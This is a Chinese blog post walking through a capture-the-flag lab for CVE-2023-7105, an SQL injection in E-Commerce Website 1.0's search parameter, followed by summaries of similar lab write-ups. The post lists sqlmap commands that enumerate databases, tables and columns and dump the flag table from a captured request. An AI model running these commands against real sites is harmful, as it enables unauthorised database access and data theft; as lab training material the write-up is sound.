春秋云镜 CVE-2023-7105

已于 2024-04-15 17:54:50 修改
阅读量320 收藏 2
点赞数 3
分类专栏: 春秋云镜 文章标签: 安全
于 2024-04-10 16:13:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq274575499/article/details/137600203
版权

靶标介绍:

E-Commerce Website 1.0 允许通过“index_search.php”中的参数“search”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。

开启靶场:

漏洞验证:

1、网页下拉,找到search搜索栏。

2、输入数字“1”,使用burp抓包。

3、保存post包为55.txt

4、使用sqlmap暴库

sqlmap.py -r 55.txt --batch --dbs

5、找当前数据库

sqlmap.py -r 55.txt --batch --current-db

6、sqlmap爆表

sqlmap.py -r 55.txt --batch -D electricks --tables

7、sqlmap暴列

sqlmap.py -r 55.txt --batch -D electricks -T flllaaaag --columns

8、sqlmap暴字段

sqlmap.py -r 55.txt --batch -D electricks -T flllaaaag -C flag  --dump

9、得到flag

QYpiying
关注
专栏目录
ECTouch 电商微信小程序 SQL注入漏洞复现(CVE-2023-39560)
0xSec
01-20 752
ECTouch 电商系统 /ectouch-main/include/apps/default/helpers/insert.php 文件中第285行的 insert_bought_notes 函数中,传入的 $arr['id'] 参数未进行验证和过滤,导致未经身份验证的攻击者利用该漏洞进行SQL注入,获取数据库敏感信息。
E-Commerce Website 搜索框注入漏洞(CVE-2023-7105
最新发布
qq_23003811的博客
08-01 196
E-Commerce Website 1.0 允许通过“index_search.php”中的参数“search”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。2、抓包,复制POST包数据到1.txt文件,放到sqlmap工具目录下。1、在页面搜索框任意输入点击搜索。4、使用sqlmap获取flag。
春秋云境CVE-2023-7105
2303_76653367的博客
05-09 491
E-Commerce Website 1.0 允许通过“index_search.php”中的参数“search”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞.3.保存POST包,sqlmap跑,爆库。2.下拉找到搜索框,随便输入,抓包。
春秋云境 CVE-2022-32991
qq_44640313的博客
05-13 329
Web Based Quiz System SQL注入,CVE-2022-32991漏洞
春秋云境CVE-2023-7130
m0_64432806的博客
03-28 757
春秋云境CVE-2023-7130 College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据.
春秋云境靶场CVE-2022-32991漏洞复现(sql手工注入)
zyh1588的博客
11-14 1314
小白复现CVE-2022-32991漏洞,该CMS的welcome.php中存在SQL注入攻击......
春秋云境】CVE-2023-39560 ECTouch v2 SQL注入
HMX404的博客
04-08 613
xpath语法错误extractvalue() --查询节点内容updatexml() --修改查询到的内容它们的第二个参数都要求是符合xpath语法的字符串如果不满足要求则会报错,并且将查询结果放在报错信息里–主键重复(duplicate entry)floor() --返回小于等于该值的最大整数只要是count,rand(),group by 三个连用就会造成这种主键重复报错。
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋云镜CVE-2023-38836
06-15
很抱歉,由于安全性和隐私保护原则,我无法提供详细的CVE(Common Vulnerabilities and Exposures)报告或漏洞分析,尤其是对于特定的漏洞如春秋云镜CVE-2023-38836。CVE是一个由美国国家网络安全中心维护的系统,...
[春秋云镜]CVE-2022-26965 XStream Pluck-CMS-Pluck-4.7.16 后台RCE
b1n的博客
08-23 474
Pluck-CMS-Pluck-4.7.16 后台RCE。
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...
i春秋云境.com【1-3】
qq_58091216的博客
03-06 672
i春秋云境.com
春秋云境:CVE-2022-32991[漏洞复现]
如有错误感谢斧正
04-17 459
则我们的目标就在于寻找welcome.php地址以及相关的可注入eid参数。该漏洞是由于welcome.php中的eid参数包含了SQL注入漏洞。可以看到这里的URL地址就出现了welcome.php和eid参数。进入了home目录,这里有三个话题可以选择开启。先在页面正常注册、登录一个账号。拿到了四个数据库,继续选择ctf库进行爆表。随便选择一个进行开启点击Start即可。进入后查看网页URL。
春秋云境-CVE-2023-2130
dsasdasdd的博客
04-13 323
题目描述:在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。发现有回显,直接sqlmap爆破数据库。url输入id=1 看有没有回显。进入他提示的组件位置。
春秋云境:CVE-2022-24124
一只爱吃橙子的羊
12-02 2566
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
春秋云镜 CVE-2023-7106
qq274575499的博客
04-10 387
E-Commerce Website 1.0 允许通过“/pages/product_details.php”中的参数“prod_id”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。
春秋云镜 CVE-2020-26042
qq_22002773的博客
08-07 251
春秋云镜 CVE-2020-26042
春秋云境CVE-2022-24223
m0_64432806的博客
03-23 327
春秋云境CVE-2022-24223 AtomCMS SQL注入漏洞
春秋云境:CVE-2022-25488
一只爱吃橙子的羊
11-30 1434
Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

QYpiying

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值